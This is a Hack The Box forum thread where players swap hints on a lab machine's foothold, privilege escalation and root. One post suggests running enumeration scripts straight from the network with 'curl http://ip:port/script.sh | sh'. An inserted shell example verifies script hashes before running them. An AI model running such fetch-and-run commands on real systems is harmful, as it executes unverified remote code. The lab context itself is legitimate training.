Comments
Need a hint with root: going through /var/log but I can't get a clue to root this box.
@0xstain said:
Are you going through /var/log with the user with user.txt in his home folder?
removed by user
Hello Guys and Gals,
Could someone possibly help me with the foothold? I've found a bunch of stuff, tried some brute forcing, enum with Burp, Zap, Nikto, etc. and am still struggling. My weak point is definitely DNS enumeration, so this could possibly be my weakness here.
Many Thanks, Taz
@TaZ0w said:
I doubt that DNS enum/fuzzing will get you anywhere. You should rather investigate data you send to and receive from the server.
GREM | OSCE | GASF | eJPT
@TaZ0w said:
Have you visited the site in a browser?
Have you run a directory busting tool? (I found gobuster better than dirb here but YMMV).
If the answer to both is "yes" then look into what happens when you create a new thing and see what you can modify. When you modify it in a way it still works, see if you can now access one of the other things you should have found.
HTB doesn't tend to use DNS.
Hi
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
@TazWake said:
Hey fellow Taz
Yes to both of those. Your comment here, though, has made something go "ping" in my head. Thanks man, let me have a poke around, I'll let you know how I get on!
T
@TazWake said:
Jesus, thanks man. It's amazing how simple some things can be; I've spent literally 2 hours on DNS today and it was as simple as the r****d.
I now have the subdomain, so onwards and upwards!
@TaZ0w said:
Awesome.
A small change on one POST request should allow you to access a page you couldn't access before. That holds a wealth of useful information.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.
Edit: never mind, I got it.
i will @benjamin2000
For anyone who reads this: use
mktemp -d
to create a temporary directory and stop downloading your scripts into the /home directory.
@Feror said:
There's no need to even download the scripts to disk, you can simply
curl http://ip:port/script.sh | sh
(or
wget -O - ...
when
curl
isn't available)
GREM | OSCE | GASF | eJPT
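As an added defender-oriented example (not code from anyone in this thread): rather than piping curl straight into sh, stage the script in a mktemp -d directory and only run it when its SHA-256 matches a digest you already trust, then remove the staging directory. The helper names, the URL and the expected digest are assumptions; it relies on sha256sum from coreutils.

```shell
#!/bin/sh
# Added example, not from the thread. Stages a remote helper script in a
# private temp directory, verifies its SHA-256 against a known value and
# only then runs it, cleaning the staging directory up afterwards.
set -u

# verify_script FILE EXPECTED_SHA256
# Returns 0 when FILE's SHA-256 equals EXPECTED_SHA256, 1 otherwise.
verify_script() {
    actual=$(sha256sum "$1" | cut -d' ' -f1) || return 1
    [ "$actual" = "$2" ]
}

# run_verified URL EXPECTED_SHA256
# Fetches URL into a fresh mktemp -d directory (never /home), refuses to
# execute on a digest mismatch, and removes the directory on every path.
run_verified() {
    url=$1
    expected=$2
    work=$(mktemp -d) || return 1
    if command -v curl >/dev/null 2>&1; then
        curl -fsSL "$url" -o "$work/script.sh"
    else
        wget -q -O "$work/script.sh" "$url"   # fallback when curl is absent
    fi
    status=$?
    if [ "$status" -eq 0 ] && verify_script "$work/script.sh" "$expected"; then
        sh "$work/script.sh"
        status=$?
    else
        echo "refusing to run $url: download failed or digest mismatch" >&2
        status=1
    fi
    rm -rf "$work"
    return "$status"
}

# Hypothetical usage; the URL and digest are placeholders, not real values:
# run_verified http://10.10.14.1:8000/enum.sh <sha256-you-recorded-earlier>
```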
So many hours wasted trying to grep through /var/logs. Once I got past the first user I got root within 5 minutes.
Had to use a local tool I'd never heard of before. Feel free to PM for nudges but let me know what you've already tried. Plenty of hints for foothold and first user through the thread
Really funny box. If anyone gets stuck on log files, update your enum script version and try again (it took me 2 hours).
Thanks for this box
Rooted
You can pm me on discord sh4d0wless#6154
@tsheva said:
Yes, I have user, not www-data.
Hello friends, I hope that you are doing great out there. I'm stuck with root. When I try to run the script with the c******* run-script command, I end up with this error: Script "command" is not defined in this package. Any solution or hint appreciated.
Finally rooted! If anyone needs a nudge, PM me.
fun box
Finally made it. Feel free to PM for a nudge.
Rooted. Need a nudge? Just PM.
Rooted now, learned some things doing this box!
What a traumatic machine... I was so frustrated that I was going to skip this machine. Thanks to @IvanV who motivated me to go on.
Lesson learned: Even when you think you know how to retrieve things, GOOGLE IT!!!! 😂
Anyone do the user part manually?
I was able to escalate my privs on the webpage but I don't fully understand why it worked that way. Can someone point me in the right direction on documentation or explain why changing a certain value worked the way it did? Thanks in advance!
Rooted the machine, it was a really fun box, learned a lot.
PM for a nudge, good luck.
Rooted. The hardest part was definitely getting that 2nd user. Foothold wasn't too bad and root was the easiest. @sh4d0wless mentioned updating enum script and running again. That's what did it for me.
I too am stuck on the foothold thing. I believe I found the small change I need to make; I would be happy to discuss my strategy to see if I am headed in the right direction. So far none of the changes allows any new accesses. I'm sure it's got to be something even more simple than what I'm attempting...
@Sc0rp10ne said:
It is a small change. When you make it and it still works, you can log in to a new page with the credentials you have created.
Note: https://www.nohello.com/
Happy to help people but PLEASE explain your problem in as much detail as possible! If you say vague things like "It's not working", I can't help. This isn't Twitter so my DMs are always open.
Currently have very limited HTB time but will try to respond as quickly as possible.